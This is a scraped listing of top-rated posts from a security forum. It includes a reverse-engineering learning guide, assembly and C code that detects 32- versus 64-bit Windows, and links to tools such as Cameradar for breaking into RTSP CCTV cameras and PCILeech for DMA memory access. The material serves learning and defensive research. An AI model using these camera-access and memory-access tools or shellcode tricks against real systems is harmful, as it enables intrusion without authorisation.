one needs to learn. Once successfully completed the exercise with one set of tools, try the same with a different assembler/linker (assembly dialects vary a little, or a little more if we point at Intel vs AT&T syntax issue - try to get familiar with such small variations to not get surprised by them). I would recommend trying out the following combinations: • Linux 32-/64-bits and GNU Assembler (Intel, AT&T, or both), • Windows 32-/64-bits and fasm, • Linux 32-/64-bits and nasm + GCC. 3 A common mistake is to try to learn assembly from e.g. a 16-bit + DOS + tasm tutorial while using e.g. 32-bit + Linux + nasm - this just won't work. Be sure that you use a tutorial matched to your architecture + operating system + assembler (these three things), otherwise you'll run into unexpected problems. One thing to remember while learning assembly is that it's a really really simple language on syntax level, but the complexity comes with having to remember various implicit details related to the ABI (Application Binary Interface), the OS and the architecture. Assembly is actually pretty easy once you get the general idea, so don't be scared by it. A couple of supporting links: • The Complete Pentium Instruction Set Table (32 Bit Addressing Mode Only) by Sang Cho - a cheatsheet of 32-bit x86 instructions and their machine-code encoding; really handy at times. • Intel® 64 and IA-32 Architectures Software Developer Manuals - Volume 2 (detailed description of the instructions) is something you want to keep close and learn how to use it really well. I would recommend going through Volume 1 when learning, and Volume 3 at intermediate/advance level. • AMD's Developer Guides, Manuals & ISA Documents - similar manuals, but from AMD; some people prefere these. • [Please look in the comment section for any additional links recommended by others.] One way of learning assembly I didn't mention so far, but which is really obvious in the context of this post, is learning by reading it, i.e. by reverse engineering code4. 4 Do remember however that reading the code will not teach you how to write it. These are related but still separate skills. Please also note that in order to be able to modify the behavior of an application you do have to be able to write small assembly snippets (i.e. patches). To do that one usually needs a disassembler, ideally an interactive one (that allows you to comment, modify the annotations, display the code in graph form, etc): • Most professionals use IDA Pro, a rather expensive but powerful interactive disassembler, that has a free version (for non-commercial use) that's pretty limited, but works just fine for 32-bit Windows targets. • The new player on the market is Binary Ninja, which is much cheaper, but still might be on the expensive side for hobbyists. • Another one is called Hopper, though it's available only for Linux and macOS. • There is also an open source solution in the form of radare2 - it's pretty powerful and free, but has the usual UX problems of open-source software (i.e. the learning curve for the tool itself is much steeper). • If all else fails, one can always default to non-interactive disassembler such as objdump from GNU binutils that supports architectures that even IDA doesn't (note that in such case you can always save the output in a text file and then add comments there - this is also a good fallback when IDA/BN/etc don't support a given architecture of interest). Having the tool of choice installed and already knowing some assembly it's good to just jump straight into reverse-engineering of small and simple targets. A good exercise is to write a program in C/C++ and compile it, and then just having the disassembler output trying to reverse it into a high-level representation, and finally into proper C/C++ code (see the illustration below). Once you get a hang of this process you should also be able to skip it altogether and still be able to understand what a given function does just after analyzing it and putting some comments here and there (keep in mind that this does take some practice). One important thing I have not yet mentioned is that being able to reverse a given function only gives you a low-level per-function view of the application. Usually to understand an application you need to first find which functions is it worth to analyze at all. For example, you probably don't want to get sidetracked by spending a few hours reversing a set of related functions just to find out they are actually the implementation of malloc or std::cout (well, you'll reverse your share of these anyway while learning, that's just how it is). There are a few tips I can give you here: • Find the main function and start the analysis from there. • Look at the strings and imported functions; find where they are used and go up the call-stack from there. • More advance reversers also like to do trace diffing in case of larger apps, though this FAQ isn't a place to discuss this technique. Debugging the live target Needless to say that a debugger is a pretty important tool - it allows you to stop execution of a process at any given point and analyze the memory state, the registers and the general process environment - these elements provide valuable hints towards the understanding the code you're looking at. For example, it's much easier to understand what a function does if you can pause its execution at any given moment and take a look what exactly does the state consist of; sometimes you can just take an educated guess (see also the illustration below). Of course the assembly language mentioned in the previous section comes into play here as well - one of the main views of a debugger is the instruction list nearby the instruction pointer. There is a pretty good choice of assembly-level debuggers out there, though most of them are for Windows for some reason5: • x64dbg - an open-source Windows debugger similar in UX to the classic OllyDbg. This would be my recommendation for the first steps in RE; you can find it here. • Microsoft WinDbg - a free and very powerful user-land and kernel-land debugger for Windows made by Microsoft. The learning curve is pretty steep as it's basically a command-line tool with only some features available as separate UI widgets. It's available as part of Windows SDK. On a sidenote, honorary_bot did a series of livestreams about WinDbg - it was in context of kernel debugging, but you still can pick up some basics there (1, 2, 3, 4; at first start with the 2nd part). • GDB - the GNU Debugger is a powerful open-source command-line tool, which does require you to memorize a set of commands in order to be able to use it. That said, there are a couple of scripts that make life easier, e.g. pwndbg. You can find GDB for both Linux and Windows (e.g. as part of MinGW-w64 packet), and other platforms; this includes non-x86 architectures. • [Some interactive disassemblers also have debugging capabilities.] • [Do check out the comment section for other recommendations.] 5 The reason is pretty obvious - Windows is the most popular closed-source platform, therefore Windows branch of reverse-engineering is the most developed one. The basic step after installing a debugger is getting to know it, therefore I would recommend: • walking through the UI with a tutorial, • and also seeing how someone familiar with the debugger is using it. YouTube and similar sites seem to be a good starting point to look for these. After spending some time getting familiar with the debugger and attempting to solve a couple of crackmes I would recommend learning how a debugger works internally, initially focussing on the different forms of breakpoints and how are they technically implemented (e.g. software breakpoints, hardware breakpoints, memory breakpoints, and so on). This gives you the basis to understand how certain anti-RE tricks work and how to bypass them. Further learning milestones include getting familiar with various debugger plugins and also learning how to use a scripting language to automate tasks (writing ad-hoc scripts is a useful skill). Behavioral analysis The last group of methods is related to monitoring how a given target interacts with the environment - mainly the operating system and various resources like files, sockets, pipes, register and so on. This gives you high-level information on what to expect from the application, and at times also some lower-level hints (e.g. instruction pointer when a given event happened or a call stack). At start I would recommend taking a look at the following tools: • Process Monitor is a free Windows application that allows you to monitor system-wide (with a convenient filtering options) access to files, register, network, as well as process-related events. • Process Hacker and Process Explorer are two free replacements for Windows' Task Manager - both offer more details information about a running process though. • Wireshark is a cross-platform network sniffer - pretty handy when reversing a network-oriented target. You might also want to check out Message Analyzer for Windows. • strace is a Linux tool for monitoring syscall access of a given process (or tree of processes). It's extremely useful at times. • ltrace is similar to strace, however it monitors dynamic library calls instead of syscalls. • [On Windows you might also want to search for a "WinAPI monitor", i.e. a similar tool to ltrace (I'm not sure which tool to recommend here though).] • [Some sandboxing tools for Windows also might give you behavioural logs for an application (but again, I'm not sure which tool to recommend).] • [Do check out the comment section for other recommendations.] The list above barely scratches the surface of existing monitoring tools. A good habit to have is to search if a monitoring tool exists for the given resource you want to monitor. Other useful resources and closing words As I mentioned at the beginning, this post is only supposed to get you started, therefore everything mentioned above is just the tip of the proverbial iceberg (though now you should at least know where the iceberg is located). Needless to say that there are countless things I have not mentioned here, e.g. the whole executable packing/unpacking problems and other anti-RE & anti-anti-RE struggles, etc. But you'll meet them soon enough. The rest of this section contains various a list of books, links and other resources that might be helpful (but please please keep in mind that in context of RE the most important thing is almost always actually applying the knowledge and almost never just reading about it). Let's start with books: • Reverse Engineering for Beginners (2017) by Dennis Yurichev (CC BY-SA 4.0, so yes, it's free and open) • Practical Malware Analysis (2012) by Michael Sikorski and Andrew Honig • Practical Reverse Engineering (2014) by Bruce Dang, Alexandre Gazet, Elias Bachaalany, Sebastien Josse • [Do check out the comment section for other recommendations.] There are of course more books on the topic, some of which I learnt from, but time has passed and things have changed, so while the books still contain valuable information some of it might be outdated or targeting deprecated tools and environments/architectures. Nonetheless I'll list a couple here just in case someone interested in historic RE stumbles upon this post: • Hacker Disassembling Uncovered (2003) by Kris Kaspersky (note: first edition of this book was made available for free by the author, however the links no longer work) • Reversing: Secrets of Reverse Engineering (2005) by Eldad Eilam • [Do check out the comment section for other recommendations.] Some other resources that you might find useful: • Tuts 4 You - a large website dedicated to reverse-engineering. I would especially like to point out the Downloads section which, among other things, contains tutorials, papers and CrackMe challenges (you can find the famous crackmes.de archive there too). • /r/ReverseEngineering - reddit has a well maintained section with news from the RE industry. • Reverse Engineering at StackExchange - in case you want to skim through commonly asked questions or ask your own. • PE Format - Windows executable file format - it's pretty useful to be familiar with it when working on this OS. • Executable and Linkable Format (ELF) - Linux executable file format (see note above). • Ange Albertini's executable format posters (among many other things) - analyzing Ange's PE and ELF posters greatly simplifies the learning process for these formats. • [Do check out the comment section for other recommendations.] I'll add a few more links to my creations, in case someone finds it useful: • Practical RE tips (1.5h lecture) • You might also find some reverse-engineering action as part of my weekly livestreams. An archive can be found on my YouTube channel. Good luck! And most of all, have fun! Sursa: http://gynvael.coldwind.pl/?id=664
  30. 4 points
    September 24, 2017 Detecting Architecture in Windows Leave a comment After a while I thought of posting something interesting I noticed. Some of you know this old method of detecting the architecture using the CS segment register. This was also used in the Kronos malware 1 2 3 xor eax,eax mov ax,cs shr eax,5 I had a look at the segment registers last night and I found out that we can use ES, GS and FS segment registers for detecting the architecture as well. Using ES 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax,eax mov ax,es ror ax, 0x3 and eax,0x1 test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 Using GS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax, eax mov eax, gs test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 .end main Using TEB Apart from that, you can also use TEB + 0xc0 entry which is ‘WOW32Reserved’. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax, eax mov eax, [FS:0xc0] test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 .end main I included all in one and coded a small C application. I’m sure there might be many other tricks to detect the architecture. This might come handy in shellcoding #include <Windows.h> #include <wchar.h> /* * Author: Osanda Malith Jayathissa - @OsandaMalith * Website: https://osandamalith.com * Description: Few tricks that you can use to detect the architecture in Windows * Link : http://osandamalith.com/2017/09/24/detecting-architecture-in-windows/ */ BOOL detectArch_ES() { #if defined(_MSC_VER) _asm { xor eax, eax mov ax, es ror ax, 0x3 and eax, 0x1 } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov ax, es;" "ror ax, 0x3;" "and eax, 0x1;" ); #endif } BOOL detectArch_GS() { #if defined(_MSC_VER) _asm { xor eax, eax mov ax, gs } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov ax, gs;" ); #endif } BOOL detectArch_TEB() { #if defined(_MSC_VER) _asm { xor eax, eax mov eax, fs:[0xc0] } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov eax, fs:[0xc0];" ); #endif } int main(int argc, char* argv[]) { wprintf( !detectArch_ES() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); wprintf( !detectArch_GS() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); wprintf( !detectArch_TEB() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); return 1337; } view raw detectArch.c hosted with by GitHub Sursa: https://osandamalith.com/2017/09/24/detecting-architecture-in-windows/
  31. 4 points
    Pentru cei interesati, tot Andrew Ng preda si o serie de cursuri mai avansate despre Deep Learning. https://www.coursera.org/specializations/deep-learning
  32. 4 points
    Asta-i HACKING! Nu apostrof si pupacel in site-ul lui Maruta sau mai stiu eu ce labar nenorocit.
  33. 3 points
    Google has finally launched a bug bounty program for Android apps on Google Play Store, inviting security researchers to find and report vulnerabilities in some of the most popular Android apps. Dubbed "Google Play Security Reward," the bug bounty program offers security researchers to work directly with Android app developers to find and fix vulnerabilities in their apps, for which Google will pay $1000 in rewards. "The goal of the program is to further improve app security which will benefit developers, Android users, and the entire Google Play ecosystem," the technology giant says in a blog post published today. Google has collaborated with bug bounty platform, HackerOne, to manage backend for this program, like submitting reports and inviting white-hat hackers and researchers. White-hat hackers who wish to participate can submit their findings directly to the app developers. Once the security vulnerability has been resolved, the hacker needs to submit his/her bug report to HackerOne. Google will then pay out a reward of $1,000 based on its Vulnerability Criteria, wherein, according to the company, more criteria may be added in the future, creating more scope for rewards. "All vulnerabilities must be reported directly to the app developer first. Only submit issues to the Play Security Rewards Program that have already been resolved by the developer." HackerOne said. "For now, the scope of this program is limited to RCE (remote-code-execution) vulnerabilities and corresponding POCs (Proof-of-concepts) that work on Android 4.4 devices and higher." It is an unfortunate truth that even after so many efforts by Google, malicious apps continuously somehow managed to fool its Play Store's security mechanism and infect millions of Android users. It's notable that Google Play Security Reward program does not include finding and reporting fake, adware or malware apps available on Google play store, so the program will not affect the increase in malicious apps on Google's app platform. For now, a limited number of Android apps have been added to Google Play Security Reward Program, including Alibaba, Snapchat, Duolingo, Line, Dropbox, Headspace, Mail.ru and Tinder. So what you are waiting for? Roll up your sleeves and start hunting for vulnerabilities. For more details about Google Play Security Reward Program, visit HackerOne. Sursa: https://thehackernews.com/2017/10/android-bug-bounty.html
  34. 3 points
  35. 3 points
    De departe, cel mai meserias: http://x.co/ZeusLinux
  36. 3 points
    Si apoi, dupa ce s-a facut vanzarea: https://www.sec.gov/Archives/edgar/data/732712/000073271217000003/a2017_10x3xoathxexhibitx991.htm Mda...
  37. 3 points
    Cred ca, teoretic, daca AI s-ar dezvolta suficient, multe pozitii IT s-ar putea inlocui. La inceput, o sa fie AI care face "munca de jos", si noi sa ne batem capul doar cu concepte mai high-level (pana ajunge si AI-ul acolo, and then repeat). Totusi, poate(sper) o sa fie schimbari pozitive per total, poate o mai scoata lumea din "rat race" si oamenii o sa aiba timp sa fie mai mult oameni, si mai putin sclavi moderni, ceea ce s-ar putea sa si imbunatateasca relatiile dintre oameni. Sunt multi oameni care nu fac deloc ceva ce le place, pt ca isi consuma aproape tot timpul cu un job care ii ajuta doar sa supravietuiasca, si asta contribuie la multe lucruri negative. Dar o posibila parte negativa e ca daca ai tehnologie care face aproape totul pentru tine ca om, multi nu o sa isi mai exerseze abilitatile cognitive prea mult, ducand astfel la o scadere a inteligentei (am ajuns la acest nivel de inteligenta ca oameni tocmai prin rezolvarea problemelor pe care le intampinam), cu alte cuvinte lumea o sa se prosteasca si mai tare, ceea ce o sa fie un punct de exploatat pentru unii. Desigur, TV-ul si internetul folosit doar pentru divertisment fac asta deja cu multe persoane, dar sper sa nu creasca prea tare numarul lor in viitor.
  38. 3 points
    Salut, Cautam un Junior Penetration Tester/Ethical Hacker pentru a se alatura echipei noastre in Bucuresti. Daca vreti sa lucrati in echipa cu 3 membri RST ( @TheTime, @dancezar si eu), trimiteti-mi CV-ul prin PM. Pentru alte detalii (non-confidentiale) astept PM. Un profil oficial (general) al job-ului ar fi urmatorul: Job Brief We are looking for a Junior Penetration Tester to join our Penetration Testing team and work in our Lab in Bucharest. Responsibilities • Identify security vulnerabilities in web applications (e.g. Internet Banking web applications, e-commerce websites, web portals) • Conduct internal network penetration testing - simulate a malicious individual (e.g. guest, temporary personnel) who already has access to our client's internal network of our client. Starting only from a simple network port access, you should gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags • Perform mobile application penetration tests on Android, iOS, or Windows applications • Exploit the identified vulnerabilities and identify specific, meaningful risk to clients based on industry and business focus • Write comprehensive reports including assessment-based findings, outcomes and recommendations for further security enhancement Requirements • Experience in identifying and reporting security vulnerabilities • Familiarity with web related technologies (Web applications, Web Services) and of network/web related protocols • Detailed technical knowledge of at least one of: software security, operating systems security, network security • Understanding of the latest security principles, techniques and protocols • Should have excellent English written and verbal skills • Bachelor’s degree in Computer Science or related field • Problem solving skills and ability to work under pressure • Should be able to work individually or as member of a team Benefits • Attractive salary package, including meal tickets and health insurance • Work with like-minded, driven and smart team members • Encouraged to perform research and participate at security conferences • Work flexibility • Private, dedicated workspace for security related projects
  39. 3 points
    E bine sa visezi dar cu cap. Cine stie ce a fumat omul... inainte sa scoata pe gura lucrurile alea. Daca avea atata incredere in tehnologie nu se apucau sa falsifice emisiile de carbon la milioane de masini ca sa jupeasca multe milioane euro. Poate ca din "ivory tower"-ul lui lucrurile par mai aproape de realitate dar nu a apucat sa traiasca o viata de rand sa vada in ce stare e infrastructura unei tari, sa vada cat de multi oameni depind de food banks si ajutoare sociale, de ceea ce sunt in stare unii "oameni" sa faca altora, etc. Cu alte cuvinte sa vada mizeria umana in cele mai depravate si ascunse unghiuri. Cat despre.. Babuinland multi inca se caca in fundul curtii si beau spirt Mona tras prin paine. A se adauga +500 ani la orice estimare de ani.
  40. 3 points
    Synopsis: Cameradar hacks its way into RTSP CCTV cameras. An RTSP stream access tool that comes with its library. Link: https://github.com/EtixLabs/cameradar
  41. 3 points
    Synopsis: PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system. Link: https://github.com/ufrisk/pcileech/
  42. 3 points
    Hacking Soft Tokens Advanced Reverse Engineering on Android Bernhard Mueller © 2016 Vantage Point Security Pte. Ltd. Table of Contents Introduction............................................................................................................................................................... 5 Mobile One-Time Password Token Overview.................................................................................................... 6 OATH TOTP..................................................................................................................................................................................6 Proprietary Algorithms...................................................................................................................................................................7 Provisioning......................................................................................................................................................................................7 Attacks...............................................................................................................................................................................................8 Retrieval from Memory..............................................................................................................................................................9 Code Lifting and Instrumentation ...........................................................................................................................................9 The Android Reverser’s Toolbox......................................................................................................................... 10 De-Compilers, Disassemblers and Debuggers.....................................................................................................................10 Tracing Java Code.....................................................................................................................................................................11 Tracing Native Code ................................................................................................................................................................15 Tracing System Calls.................................................................................................................................................................17 Classic Linux Rootkit Style......................................................................................................................................................19 Dynamic Analysis Frameworks..............................................................................................................................................19 Drawbacks Emulation-based Analysis ..................................................................................................................................21 Hacking Soft Tokens - Bernhard Mueller © 2016 Vantage Point Security Pte. 4 of 68 Runtime Instrumentation with Frida .....................................................................................................................................22 Building A Sandbox................................................................................................................................................ 23 Sandbox Overview....................................................................................................................................................................24 Customizing the Kernel...........................................................................................................................................................25 Customizing the RAMDisk.....................................................................................................................................................26 Booting the Environment .......................................................................................................................................................28 Customizing ART.....................................................................................................................................................................29 Hooking System Calls ..............................................................................................................................................................31 Automating System Call Hooking with Zork.......................................................................................................................35 Case Studies ............................................................................................................................................................. 36 RSA SecurID: ProGuard and a Proprietary Algorithm...........................................................................................................37 Analyzing ProGuard-processed Bytecode ............................................................................................................................37 Data Storage and Runtime Encryption .................................................................................................................................39 Tool Time: RSACloneId..........................................................................................................................................................41 Vendor Response......................................................................................................................................................................44 Summary.....................................................................................................................................................................................45 Vasco DIGIPASS: Advanced Anti-Tampering........................................................................................................................47 Initial Analysis ...........................................................................................................................................................................47 Root Detection and Integrity Checks....................................................................................................................................51 Native Debugging Defenses ...................................................................................................................................................54 JDWP Debugging Defenses....................................................................................................................................................56 Static-dynamic Analysis............................................................................................................................................................58 Attack Outline ...........................................................................................................................................................................59 Tool Time: VasClone....................................................................................................................................................................60 Vendor Comments........................................................................................................................................................................64 Summary.....................................................................................................................................................................................65 TL; DR...................................................................................................................................................................... 66 Attack Mitigation...........................................................................................................................................................................66 Software Protection Effectiveness..............................................................................................................................................66 REFERENCES....................................................................................................................................................... 67 Download: http://gsec.hitb.org/materials/sg2016/whitepapers/Hacking Soft Tokens - Bernhard Mueller.pdf
  43. 3 points
    Nu te mai binecuvanteaza Allah...
  44. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  45. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  46. 3 points
    Rapid7 Nexpose Community Edition is a free vulnerability scanner & security risk intelligence solution designed for organizations with large networks, prioritize and manage risk effectively. It proactively supports the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation. Nexpose Community Edition Features Data breaches are growing at an alarming rate. Your attack surface is constantly changing, the adversary is becoming more nimble than your security teams, and your board wants to know what you are doing about it. Nexpose gives you the confidence you need to understand your attack surface, focus on what matters, and create better security outcomes. Real Risk Score – The standard 1-10 CVSS score results in thousands of “critical” vulnerabilities. Adaptive Security – With Adaptive Security, you can automatically detect and assess new devices and new vulnerabilities the moment they access your network. Policy Assessment – Hardening your systems is just as important as finding and fixing vulnerabilities. Remediation Reporting – Help IT help you. With Nexpose remediation reports, show IT the 25 actions they can take right now to reduce the most risk. Integration with Metasploit – With Metasploit Pro, you can validate your vulnerability scanner results using an automated, closed-loop process. Powerful Reporting – Do you know where you should invest energy and budget? Compliance Requirements – Stay compliant with PCI DSS, NERC CIP, FISMA (USGCB/FDCC), HIPAA/HITECH, Top 20 CSC, DISA STIGS, and CIS standards. Download Nexpose Community Free You can download Nexpose Community here: Nexpose Community Free 1-Year Trial Or read more here. Sources: https://www.rapid7.com/info/nexpose-community/ https://www.darknet.org.uk/2017/09/rapid7-nexpose-community-edition-free-vulnerability-scanner/
  47. 3 points
    Oare se va ajunge la asta? http://www.imdb.com/title/tt0181689/ Pe de alta parte, acest viitor e mai plauzibil: http://www.imdb.com/title/tt0387808/
  48. 3 points
    gen minori fututi de cai.
  49. 3 points
    Salut, Un curs introductiv despre Machine Learning, predat de Andrew Ng: https://www.coursera.org/learn/machine-learning Can I take this course for free? You can access all videos, readings, and discussions, free of charge. You can also submit assignments and earn a grade for free. If you want to earn a Course Certificate, you can subscribe or apply for financial aid. About Andrew Ng: Andrew was a professor at Stanford University Department of Computer Science. He taught students and undertook research related to data mining and machine learning. From 2011 to 2012, he worked at Google, where he founded and led the Google Brain Deep Learning Project. In 2012, he co-foundedCoursera to offer free online courses for everyone. In 2014, he joinedBaidu as Chief Scientist, and carried out research related to big data and A.I. In March 2017, he announced his resignation from Baidu. - https://en.wikipedia.org/wiki/Andrew_Ng About this course: Machine learning is the science of getting computers to act without being explicitly programmed. In the past decade, machine learning has given us self-driving cars, practical speech recognition, effective web search, and a vastly improved understanding of the human genome. Machine learning is so pervasive today that you probably use it dozens of times a day without knowing it. Many researchers also think it is the best way to make progress towards human-level AI. In this class, you will learn about the most effective machine learning techniques, and gain practice implementing them and getting them to work for yourself. More importantly, you'll learn about not only the theoretical underpinnings of learning, but also gain the practical know-how needed to quickly and powerfully apply these techniques to new problems. Finally, you'll learn about some of Silicon Valley's best practices in innovation as it pertains to machine learning and AI. This course provides a broad introduction to machine learning, datamining, and statistical pattern recognition. Topics include: (i) Supervised learning (parametric/non-parametric algorithms, support vector machines, kernels, neural networks). (ii) Unsupervised learning (clustering, dimensionality reduction, recommender systems, deep learning). (iii) Best practices in machine learning (bias/variance theory; innovation process in machine learning and AI). The course will also draw from numerous case studies and applications, so that you'll also learn how to apply learning algorithms to building smart robots (perception, control), text understanding (web search, anti-spam), computer vision, medical informatics, audio, database mining, and other areas.
  50. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
×